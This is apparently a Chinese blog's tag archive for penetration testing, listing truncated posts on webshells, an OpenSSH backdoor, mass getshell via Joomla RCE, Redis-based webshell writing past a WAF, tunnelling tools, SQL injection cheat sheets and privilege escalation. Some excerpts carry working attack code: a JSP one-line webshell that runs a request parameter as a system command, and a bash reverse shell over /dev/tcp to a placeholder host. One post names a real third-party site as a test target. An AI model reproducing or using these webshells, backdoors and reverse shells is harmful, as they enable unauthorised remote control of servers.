Menu

Tag Archives: 渗透测试

DEDECMS找后台目录
阿里的先知社区写了一篇dedecms找后台目录的文章 并且给出了一个php版本的 传送门 原理和废话我不多说了 我直接上一个python版本 随便找一个dede的站来实验一下 http://www.hzxxgc.com/ 网站自己修改。 上代码: ##!/usr/bin/env python # [...]
redis绕过云盾写webshell提权08服务器
半年多没写文章了。 第一部分拿webshell: 前不久,我们公司被大批肉鸡DDOS,攻击来源大约有几千个IP。 我随便选择了那么几十个打算追查一下攻击者。找到远控准备直接报警抓人。 我就随便选择其中一次追查攻击来源简单写一片日志吧。 扫描其中某一个IP [...]
ImageMagick—-Remote Command Execute in WordPress 4.5.1
ImageMagick ImageMagick 昨天曝出 CVE-2016-3714,Java、PHP 的库也受其影响。其中 PHP 的库 Imagick 应用广泛,波及也大。Wordpress 也就是受此漏洞影响出现了 RCE。 这个漏洞很蠢,ImageMagick 在 [...]
一个稳定的UDP反向端口映射方法
使用到的工具 https://github.com/ring04h/udptunnel http://fuzz.wuyun.org/src/s5.py 原理实例图   编译可执行程序 server# git clone https://github.com/ring04h/udptunnel.git [...]
JOOMLA 1.5 – 3.4.5 远程代码执行之批量GETSHELL
看大家发的都是单打独斗的,我来献丑来个批量getshell的吧,不喜勿喷! 0X01 背景 近日,Joomla 1.5 – 3.4.5爆出了一个远程代码执行的漏洞,此洞可谓影响相当之大,各个安全机构都发布了漏洞的分析报告和POC,笔者就不在此赘述了,相关的漏洞分析参见: Joomla 对象注入漏洞分析报告 [...]
jsp内网探测脚本&简单代理访问
废话不多说,直接上图: 1.直接访问默认扫描当前IP的C段,获取标题、web容器. 2.可以自定义传入需要扫描的段,传入参数ip即可 3.代理访问参数为url,可简单的访问内网的web,对了,我还加载了网站里的css,做到尽量看上去和直接访问的效果一样 <%@ page language="java" [...]
SQL注入速查表(下)与Oracle注入速查表
一、SQL注入速查表(下) 0x00 目录 盲注 关于盲注 实战中的盲注实例 延时盲注 WAITFOR DELAY [time](S) 实例 BENCHMARK()(M) 实例 pg_sleep(seconds)(P) 掩盖痕迹 -sp_password log bypass(S) 注入测试 [...]
SQL注入速查表(上)
  0x00 关于SQL注入速查表 现在仅支持MySQL、Microsoft SQL Server,以及一部分ORACLE和PostgreSQL。大部分样例都不能保证每一个场景都适用。现实场景由于各种插入语、不同的代码环境以及各种不常见甚至奇特的SQL语句,而经常发生变化。 [...]
Jsp一句话木马后门
一:执行系统命令: 无回显执行系统命令: <%Runtime.getRuntime().exec(request.getParameter("i"));%> 请求:http://192.168.16.240:8080/Shell/cmd2.jsp?i=ls [...]
Linux渗透之openSSH后门
首先拿下服务器shell权限,其次利用各种方式提下root! 拿下root之后才是开始: 1.首先查看ssh版本: [email protected]:~# ssh -V OpenSSH_6.0p1 Debian-4+deb7u2, OpenSSL 1.0.1e 11 Feb 2013   2.下载SSH [...]
Dedecms远程写文件漏洞
0x00 漏洞概述 2015年6月17日seclists网站上公布了Dedecms的一个远程getshell漏洞细节,造成这个漏洞的原因也有些让人玩味。官方已在2015年6月18日发布了修复版本,下载链接:http://www.dedecms.com/products/dedecms/downloads/ [...]
内网转发工具———-tunna
他的原理就是个HTTP tunneling工具。 +——————————————-+ [...]
PHPCMS_V9之authkey注入漏洞
在乌云上的某一个漏洞 PHPCMS最新版本authkey泄露可注射拿shell 但是他没有给出利用的方法,如何利用authkey 我有朋友写出了该漏洞的exp 比较鸡肋,成功率不高,不过还是分享给大家。 利用方式 : 首先你得有php的环境并且启动curl_init()函数 php [...]
SQLMAP 防火墙的绕过与过滤
[为0x00] – 简介 [0X01] – 过滤闪避(MySQL的) [0x01a] – 旁路功能和关键字过滤 [0x01b] – 绕过正则表达式过滤 [0X02] – 通常情况下旁路技术 [0X03] – 高级旁路技术 [0x03a] [...]
Linux下的爆破神器————-HYDRA
# hydra [-L FILE] [-p PASS | [-C FILE]] [-e ns] [-o FILE] [-t TASKS] [-M FILE [-T TASKS]] [-w TIME] [-f] [-s PORT] [-S] [-vV] server service [OPT] -R [...]
Nmap 详细介绍(2)
0x00:说明 只是一个快速查询手册,理论的东西都没有补充,欢迎大家积极在评论区补充自己常用的参数,O(∩_∩)O 0x01:nmap功能介绍 1.主机存活检测 2.端口探测 3.服务识别 4.操作系统识别 5.硬件地址检测 6.服务版本识别 7.漏洞扫描,使用nmap自带脚本 0x02:简单示例 [...]
Nmap 详细介绍(1)
ubuntu apt-get install nmap 工具介绍:NMap是Linux下的网络扫描和嗅探工具包。可以帮助网管人员深入探测UDP 或者TCP端口,直至主机所使用的操作系统;还可以将所有 探测结果记录到各种格式的日志中,为系统安全服务。NMap,也就是Network [...]
Linux发行版本号及内核版本号对照表
为了方便用EXP提权。 Redhat 9.0———————————————2.4.20-8 RHEL 3 Update 8————————————2.4.21-47 RHEL 4 ————————————————2.6.9-5 RHEL 4 Update 1————————————2.6.9-11 RHEL [...]
Linux 提权的时候需要反弹的各种方法
bash版本: bash -i >& /dev/tcp/xx.xx.xx.xx/xx 0>&1 注意这个是由解析shell的bash完成,所以某些情况下不支持 perl版本: perl -e ‘use [...]